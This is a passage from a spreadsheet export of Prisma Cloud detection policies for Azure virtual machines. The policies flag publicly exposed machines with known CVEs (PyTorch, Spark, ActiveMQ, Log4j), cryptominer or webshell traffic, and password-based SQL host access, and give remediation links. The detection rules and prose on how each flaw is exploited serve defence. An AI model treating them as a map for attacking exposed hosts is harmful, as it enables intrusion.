          <t>exposure</t>
        </is>
      </c>
      <c r="V2511" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2511" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Machine that are publicly exposed and have known exploitable Command injection PyTorch Python vulnerability (CVE-2024-5480).
CVE-2024-5480 is a critical vulnerability in PyTorch's torch.distributed.rpc framework affecting versions before 2.2.2. The vulnerability stems from improper verification of functions called during RPC operations. The flaw occurs when a worker node sends a PythonUDF (User Defined Function) to the master node, which executes it without proper validation.
Successful exploitation of the CVE-2024-5480 vulnerability on the publicly exposed Azure Virtual Machine would allow an attacker to execute arbitrary code and compromise master nodes initiating distributed training, potentially resulting in the theft of sensitive AI-related data. This could lead to monetary loss, damage to reputation, and other compliance risks for the organization.
Immediate attention is required to remediate the PyTorch (CVE-2024-5480) vulnerability and public exposure reported for the affected Azure Virtual Machine as soon as possible.</t>
        </is>
      </c>
      <c r="X2511" t="inlineStr">
        <is>
          <t>[INTERNET_EXPOSURE]
Restrict Internet exposure of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
[VULNERABILITY]
To patch or update the vulnerable software refer to https://nvd.nist.gov/vuln/detail/CVE-2024-5480</t>
        </is>
      </c>
      <c r="Y2511" t="inlineStr"/>
      <c r="Z2511" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name contains all ('Azure Virtual Machine with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2024-5480'))</t>
        </is>
      </c>
      <c r="AA2511" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2511" t="inlineStr">
        <is>
          <t>2024-08-02 06:55:43</t>
        </is>
      </c>
      <c r="AC2511" t="inlineStr"/>
      <c r="AD2511" t="b">
        <v>1</v>
      </c>
      <c r="AE2511" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2511" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG25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11" t="inlineStr">
        <is>
          <t>a6ed53a7-5a3f-4985-a540-bfb86c3f31cf</t>
        </is>
      </c>
      <c r="AI2511" t="inlineStr">
        <is>
          <t>abf38de3-30cb-42e9-b585-78e73a91c873</t>
        </is>
      </c>
      <c r="AJ2511" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2511" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2512">
      <c r="A2512" t="inlineStr"/>
      <c r="B2512" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2512" s="2" t="inlineStr"/>
      <c r="D2512" t="inlineStr"/>
      <c r="E2512" t="inlineStr"/>
      <c r="F2512" t="inlineStr"/>
      <c r="G2512" t="b">
        <v>1</v>
      </c>
      <c r="H25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2" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2512" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2512" t="inlineStr">
        <is>
          <t>Potentially unauthorized cryptomining activity detected on a publicly exposed and vulnerable Azure Virtual Machine</t>
        </is>
      </c>
      <c r="L2512" t="inlineStr">
        <is>
          <t>RESOURCE_HIJACKING,INTERNET_EXPOSURE,INITIAL_ACCESS</t>
        </is>
      </c>
      <c r="M2512" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2512" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2512" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2512" t="inlineStr">
        <is>
          <t>misconfig_and_event</t>
        </is>
      </c>
      <c r="Q2512" t="inlineStr"/>
      <c r="R2512" t="inlineStr"/>
      <c r="S2512" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2512" t="b">
        <v>0</v>
      </c>
      <c r="U2512" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2512" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2512" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Machines that are publicly exposed and connected to remote systems known for cryptominer activities, and have critical or high vulnerabilities.
Cryptominers surreptitiously use a machine's resources to mine cryptocurrencies. Attackers can exploit vulnerabilities on the affected virtual machines to compromise their confidentiality, integrity, and availability, allowing them to perform malicious actions. If network connectivity with remote systems known for cryptominer activity is observed on a publicly exposed and exploitable virtual machine, it could indicate that the instance is already under attack or has been compromised.
Immediate attention is required to investigate cryptominer activity, remediate critical and high vulnerabilities, and restrict public exposure reported for the virtual machines as soon as possible.</t>
        </is>
      </c>
      <c r="X2512"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12" t="inlineStr"/>
      <c r="Z2512" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name = (('Azure Virtual Machine with network path from the internet (0.0.0.0/0)') and ('Traffic to a suspicious IP address associated with Cryptominer activity' or 'Traffic from a suspicious IP address associated with Cryptominer activity')) AND with : (Vuln WHERE severity greater than or equal to high)</t>
        </is>
      </c>
      <c r="AA2512" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2512" t="inlineStr">
        <is>
          <t>2023-10-27 07:54:09</t>
        </is>
      </c>
      <c r="AC2512" t="inlineStr"/>
      <c r="AD2512" t="b">
        <v>1</v>
      </c>
      <c r="AE2512" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2512" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG25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2" t="inlineStr">
        <is>
          <t>5adde272-19e3-4206-b071-2156ca6e5458</t>
        </is>
      </c>
      <c r="AI2512" t="inlineStr">
        <is>
          <t>088a2c99-8907-4908-b6e2-f247066c9773</t>
        </is>
      </c>
      <c r="AJ2512" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2512" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2513">
      <c r="A2513" t="inlineStr"/>
      <c r="B2513" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2513" s="2" t="inlineStr"/>
      <c r="D2513" t="inlineStr"/>
      <c r="E2513" t="inlineStr"/>
      <c r="F2513" t="inlineStr"/>
      <c r="G2513" t="b">
        <v>1</v>
      </c>
      <c r="H25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3" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2513" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2513" t="inlineStr">
        <is>
          <t>Potentially nefarious webshell activity detected on a publicly exposed and vulnerable Azure Virtual Machine with risky privilege escalation permissions</t>
        </is>
      </c>
      <c r="L2513" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION,MALWARE,INTERNET_EXPOSURE,INITIAL_ACCESS</t>
        </is>
      </c>
      <c r="M2513" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2513" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2513" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2513" t="inlineStr">
        <is>
          <t>misconfig_and_event</t>
        </is>
      </c>
      <c r="Q2513" t="inlineStr"/>
      <c r="R2513" t="inlineStr"/>
      <c r="S2513" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2513" t="b">
        <v>0</v>
      </c>
      <c r="U2513" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2513" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2513" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Machines that are publicly exposed with critical or high vulnerabilities and are connected with remote systems known for webshell activity having permissions that could potentially lead to privilege escalation.
Publicly exposed and vulnerable Azure Virtual Machine could allow malicious actors to remotely exploit the vulnerability to get initial access to the instance. Webshell is a shell-like interface that enables a web server to be remotely accessed, often it enables threat actors to compromise web servers and launch additional attacks. The risky permissions on the instances that are connected with remote systems known for webshell activity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investigate webshell activity, review risky privilege escalation permissions, remediate critical and high vulnerabilities, and restrict public exposure reported for the virtual machines as soon as possible.</t>
        </is>
      </c>
      <c r="X2513"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13" t="inlineStr"/>
      <c r="Z2513" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name = (('Azure Virtual Machine with network path from the internet (0.0.0.0/0)' and 'Azure VM associated with entities that have risky permissions') and ('Traffic from a suspicious IP address associated with Webshell activity' or 'Traffic to a suspicious IP address associated with Webshell activity')) AND with : (Vuln WHERE severity greater than or equal to high)</t>
        </is>
      </c>
      <c r="AA2513" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2513" t="inlineStr">
        <is>
          <t>2023-10-27 07:54:09</t>
        </is>
      </c>
      <c r="AC2513" t="inlineStr"/>
      <c r="AD2513" t="b">
        <v>1</v>
      </c>
      <c r="AE2513" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2513" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG25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3" t="inlineStr">
        <is>
          <t>860049ac-69d6-4e1f-93c8-9da2bf387d38</t>
        </is>
      </c>
      <c r="AI2513" t="inlineStr">
        <is>
          <t>4c964ec1-97d4-4c81-a915-1454f6548fc7</t>
        </is>
      </c>
      <c r="AJ2513" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2513" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2514">
      <c r="A2514" t="inlineStr"/>
      <c r="B2514" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2514" s="2" t="inlineStr"/>
      <c r="D2514" t="inlineStr"/>
      <c r="E2514" t="inlineStr"/>
      <c r="F2514" t="inlineStr"/>
      <c r="G2514" t="b">
        <v>1</v>
      </c>
      <c r="H25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4" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2514" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2514" t="inlineStr">
        <is>
          <t>CRLF Injection risk due to publicly exposed and vulnerable Azure Virtual Machine [Python, CVE-2020-26137]</t>
        </is>
      </c>
      <c r="L2514" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2514" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2514" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2514" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2514" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2514" t="inlineStr"/>
      <c r="R2514" t="inlineStr"/>
      <c r="S2514" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2514" t="b">
        <v>0</v>
      </c>
      <c r="U2514" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2514" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2514" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Machines that are publicly exposed and have known exploitable CRLF injection vulnerability [Python, CVE-2020-26137].
CRLF injection vulnerability is a security flaw allowing an attacker to inject a CRLF sequence. The fact that the Azure Virtual Machine is publicly exposed makes it an easy target for an attacker to compromise the affected system.
Immediate attention is required to remediate the Python [CVE-2020-26137] vulnerability and public exposure reported for the Azure Virtual Machine as soon as possible.</t>
        </is>
      </c>
      <c r="X251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2514" t="inlineStr"/>
      <c r="Z2514" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name contains all ('Azure Virtual Machine with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2020-26137'))</t>
        </is>
      </c>
      <c r="AA2514" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2514" t="inlineStr">
        <is>
          <t>2023-10-27 07:53:53</t>
        </is>
      </c>
      <c r="AC2514" t="inlineStr"/>
      <c r="AD2514" t="b">
        <v>1</v>
      </c>
      <c r="AE2514" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2514" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG25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4" t="inlineStr">
        <is>
          <t>d1298098-6228-4090-9ae2-4a40864e9d82</t>
        </is>
      </c>
      <c r="AI2514" t="inlineStr">
        <is>
          <t>75cea176-3b87-4d9a-bfee-5ec124514fcd</t>
        </is>
      </c>
      <c r="AJ2514" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2514" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2515">
      <c r="A2515" t="inlineStr"/>
      <c r="B2515" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2515" s="2" t="inlineStr"/>
      <c r="D2515" t="inlineStr"/>
      <c r="E2515" t="inlineStr"/>
      <c r="F2515" t="inlineStr"/>
      <c r="G2515" t="b">
        <v>1</v>
      </c>
      <c r="H25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5" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2515" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2515" t="inlineStr">
        <is>
          <t>Command injection risk due to publicly exposed and vulnerable Azure Virtual Machine (Apache Spark, CVE-2022-33891)</t>
        </is>
      </c>
      <c r="L2515" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2515" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2515" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2515" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2515" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2515" t="inlineStr"/>
      <c r="R2515" t="inlineStr"/>
      <c r="S2515" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2515" t="b">
        <v>0</v>
      </c>
      <c r="U2515" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2515" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2515" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Machine that are publicly exposed and have known exploitable Command injection vulnerability (CVE-2022-33891).
Command injection vulnerability would allow an attacker to inject arbitrary commands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Spark Command injection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Spark (CVE-2022-33891) vulnerability and public exposure reported for the affected Azure Virtual Machine as soon as possible.</t>
        </is>
      </c>
      <c r="X251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2515" t="inlineStr"/>
      <c r="Z2515" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name contains all ('Azure Virtual Machine with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2022-33891'))</t>
        </is>
      </c>
      <c r="AA2515" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2515" t="inlineStr">
        <is>
          <t>2024-03-05 05:47:17</t>
        </is>
      </c>
      <c r="AC2515" t="inlineStr"/>
      <c r="AD2515" t="b">
        <v>1</v>
      </c>
      <c r="AE2515" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2515" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG25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5" t="inlineStr">
        <is>
          <t>043ac91e-d5d6-46c1-bc40-426f95122dc5</t>
        </is>
      </c>
      <c r="AI2515" t="inlineStr">
        <is>
          <t>cd1db72e-ee69-4dd0-ad7c-2408839a2b42</t>
        </is>
      </c>
      <c r="AJ2515" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2515" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2516">
      <c r="A2516" t="inlineStr"/>
      <c r="B2516" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2516" s="2" t="inlineStr"/>
      <c r="D2516" t="inlineStr"/>
      <c r="E2516" t="inlineStr"/>
      <c r="F2516" t="inlineStr"/>
      <c r="G2516" t="b">
        <v>1</v>
      </c>
      <c r="H25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6" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2516" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2516" t="inlineStr">
        <is>
          <t>Remote code execution risk due to publicly exposed and vulnerable Azure Virtual Machine (Apache ActiveMQ, CVE-2023-46604)</t>
        </is>
      </c>
      <c r="L2516" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2516" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2516" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2516" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2516" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2516" t="inlineStr"/>
      <c r="R2516" t="inlineStr"/>
      <c r="S2516" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2516" t="b">
        <v>0</v>
      </c>
      <c r="U2516" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2516" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2516" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Machine that are publicly exposed and have known exploitable Remote code execution vulnerability (CVE-2023-46604).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ActiveMQ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ActiveMQ (CVE-2023-46604) vulnerability and public exposure reported for the affected Azure Virtual Machine as soon as possible.</t>
        </is>
      </c>
      <c r="X251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CVE-2023-46604
2. Perform thorough backups of software configurations and data before applying updates
3. Refer below given URL to obtain more details on the vulnerability and fix
   https://nvd.nist.gov/vuln/detail/CVE-2023-46604</t>
        </is>
      </c>
      <c r="Y2516" t="inlineStr"/>
      <c r="Z2516" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name contains all ('Azure Virtual Machine with network path from the internet (0.0.0.0/0)') AND with : (Vuln WHERE id IN ('CVE-2023-46604'))</t>
        </is>
      </c>
      <c r="AA2516" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2516" t="inlineStr">
        <is>
          <t>2024-03-05 05:47:12</t>
        </is>
      </c>
      <c r="AC2516" t="inlineStr"/>
      <c r="AD2516" t="b">
        <v>1</v>
      </c>
      <c r="AE2516" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2516" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG25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6" t="inlineStr">
        <is>
          <t>08fa2d3e-d27c-4f2c-b736-707177abeef8</t>
        </is>
      </c>
      <c r="AI2516" t="inlineStr">
        <is>
          <t>29fcebda-8aaa-487e-80e8-90f34a4344bc</t>
        </is>
      </c>
      <c r="AJ2516" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2516" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2517">
      <c r="A2517" t="inlineStr">
        <is>
          <t>TX-RAMP Level 1, Insurance Regulatory And Development Authority Of India, TX-RAMP Level 2, ITSG-33, ISO/IEC 27001:2022</t>
        </is>
      </c>
      <c r="B2517" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2517" s="2" t="inlineStr"/>
      <c r="D2517" t="inlineStr"/>
      <c r="E2517" t="inlineStr"/>
      <c r="F2517" t="inlineStr"/>
      <c r="G2517" t="b">
        <v>1</v>
      </c>
      <c r="H25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7" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2517" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2517" t="inlineStr">
        <is>
          <t>Azure SQL on Virtual Machine (Linux) with basic authentication</t>
        </is>
      </c>
      <c r="L2517" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2517" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2517" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2517" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2517" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2517" t="inlineStr">
        <is>
          <t>Technological Controls</t>
        </is>
      </c>
      <c r="R2517" t="inlineStr">
        <is>
          <t>A8.12</t>
        </is>
      </c>
      <c r="S2517" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T2517" t="b">
        <v>0</v>
      </c>
      <c r="U2517" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2517" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2517" t="inlineStr">
        <is>
          <t>This policy identifies Azure Virtual Machines that are hosted with SQL on them and have basic authentication. 
Azure Virtual Machines with basic authentication could allow attackers to brute force and gain access to SQL database hosted on it, which might lead to information leakage. It is recommended to use SSH keys for authentication to avoid brute force attacks on SQL database hosted virtual machines.</t>
        </is>
      </c>
      <c r="X2517" t="inlineStr">
        <is>
          <t>To configure existing Azure Virtual machine with SSH key authentication, Follow below URL:
https://learn.microsoft.com/en-us/azure/virtual-machines/extensions/vmaccess#update-ssh-key
If changes are not reflecting you may need to take backup, Create new virtual machine with SSH key based authentication and delete the reported virtual machine. 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-azure-virtual-machine-does-not-enable-password-authentication
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-azure-virtual-machine-does-not-enable-password-authentication</t>
        </is>
      </c>
      <c r="Y2517" t="inlineStr"/>
      <c r="Z2517" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-vm-list' AND json.rule = powerState equal ignore case "PowerState/running" and ['properties.storageProfile'].['imageReference'].['publisher'] equal ignore case microsoftsqlserver and (['properties.osProfile'].['linuxConfiguration'] exists and ['properties.osProfile'].['linuxConfiguration'].['disablePasswordAuthentication'] is false)
{"category":"General","resourceTypes":["azurerm_linux_virtual_machine","azurerm_linux_virtual_machine_scale_set"]}</t>
        </is>
      </c>
      <c r="AA2517" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2517" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2517" t="inlineStr">
        <is>
          <t>PC-AZR-CMP-1029-CKV_AZURE_149</t>
        </is>
      </c>
      <c r="AD2517" t="b">
        <v>1</v>
      </c>
      <c r="AE2517" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2517" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG25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7" t="inlineStr">
        <is>
          <t>6c53f32c-eb09-4fa2-be43-be334f2eb808</t>
        </is>
      </c>
      <c r="AI2517" t="inlineStr">
        <is>
          <t>187eec1a-b273-413d-90e4-91a3cfe3c71d</t>
        </is>
      </c>
      <c r="AJ2517" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2517" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2518">
      <c r="A2518" t="inlineStr"/>
      <c r="B2518" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2518" s="2" t="inlineStr"/>
      <c r="D2518" t="inlineStr"/>
      <c r="E2518" t="inlineStr"/>
      <c r="F2518" t="inlineStr"/>
      <c r="G2518" t="b">
        <v>1</v>
      </c>
      <c r="H25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8" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2518" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2518" t="inlineStr">
        <is>
          <t>Remote code execution (RCE) exploitation attempt on Azure Virtual Machine with known exploitable vulnerability [Log4j, CVE-2021-44228]</t>
        </is>
      </c>
      <c r="L2518" t="inlineStr">
        <is>
          <t>WEB_ATTACK</t>
        </is>
      </c>
      <c r="M2518" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="N2518" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2518" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2518" t="inlineStr">
        <is>
          <t>event</t>
        </is>
      </c>
      <c r="Q2518" t="inlineStr"/>
      <c r="R2518" t="inlineStr"/>
      <c r="S2518" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2518" t="b">
        <v>0</v>
      </c>
      <c r="U2518" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2518" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2518" t="inlineStr">
        <is>
          <t>This policy identifies exploitation attempts on Azure Virtual Machines that are vulnerable to remote code execution (RCE) with exploits in the wild [Log4j, CVE-2021-44228]. 
The policy is triggered because of an incident finding in the WAAS module in Prisma Cloud due to an exploitation attempt of the vulnerability on the vulnerable Azure Virtual Machine. The fact that the Azure Virtual Machine has a vulnerable version of Log4j software installed makes it an easy target for an attacker to exploit this vulnerability. 
Immediate attention is required to remediate the Log4j [CVE-2021-44228] vulnerability reported for the Azure Virtual Machine.</t>
        </is>
      </c>
      <c r="X251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t>
        </is>
      </c>
      <c r="Y2518" t="inlineStr"/>
      <c r="Z2518" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('azure-vm-list') and finding.name contains all ('Attempt to exploit known vulnerabilities (CVE-2021-44228 - Apache Log4j2 &lt; 2.15.0) observed in HTTP traffic') AND with : (Vuln WHERE id IN ('CVE-2021-44228'))</t>
        </is>
      </c>
      <c r="AA2518" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2518" t="inlineStr">
        <is>
          <t>2023-10-27 07:53:40</t>
        </is>
      </c>
      <c r="AC2518" t="inlineStr"/>
      <c r="AD2518" t="b">
        <v>1</v>
      </c>
      <c r="AE2518" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2518" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG25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8" t="inlineStr">
        <is>
          <t>78bb2da8-d0c4-4064-a0e2-9fd04b9f9e46</t>
        </is>
      </c>
      <c r="AI2518" t="inlineStr">
        <is>
          <t>5e1614fd-a59a-4a8b-b2ec-b3f609e2d435</t>
        </is>
      </c>
      <c r="AJ2518" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2518" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2519">
      <c r="A2519" t="inlineStr"/>
      <c r="B2519" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2519" s="2" t="inlineStr"/>
      <c r="D2519" t="inlineStr"/>
      <c r="E2519" t="inlineStr"/>
      <c r="F2519" t="inlineStr"/>
      <c r="G2519" t="b">
        <v>1</v>
      </c>
      <c r="H25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19" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2519" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="K2519" t="inlineStr">
        <is>
          <t>Brute force attack and privilege escalation risk on a publicly exposed Azure Virtual Machine with risky permissions</t>
        </is>
      </c>
      <c r="L2519" t="inlineStr">
        <is>
          <t>MISCONFIGURATION,PRIVILEGE_ESCALATION,INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M2519" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2519" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2519" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2519" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2519" t="inlineStr"/>
      <c r="R2519" t="inlineStr"/>
      <c r="S2519" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2519" t="b">
        <v>0</v>
      </c>
      <c r="U2519" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2519" t="inlineStr">
        <is>
          <t>azure-vm-list</t>
        </is>
      </c>
      <c r="W2519" t="inlineStr">
        <is>
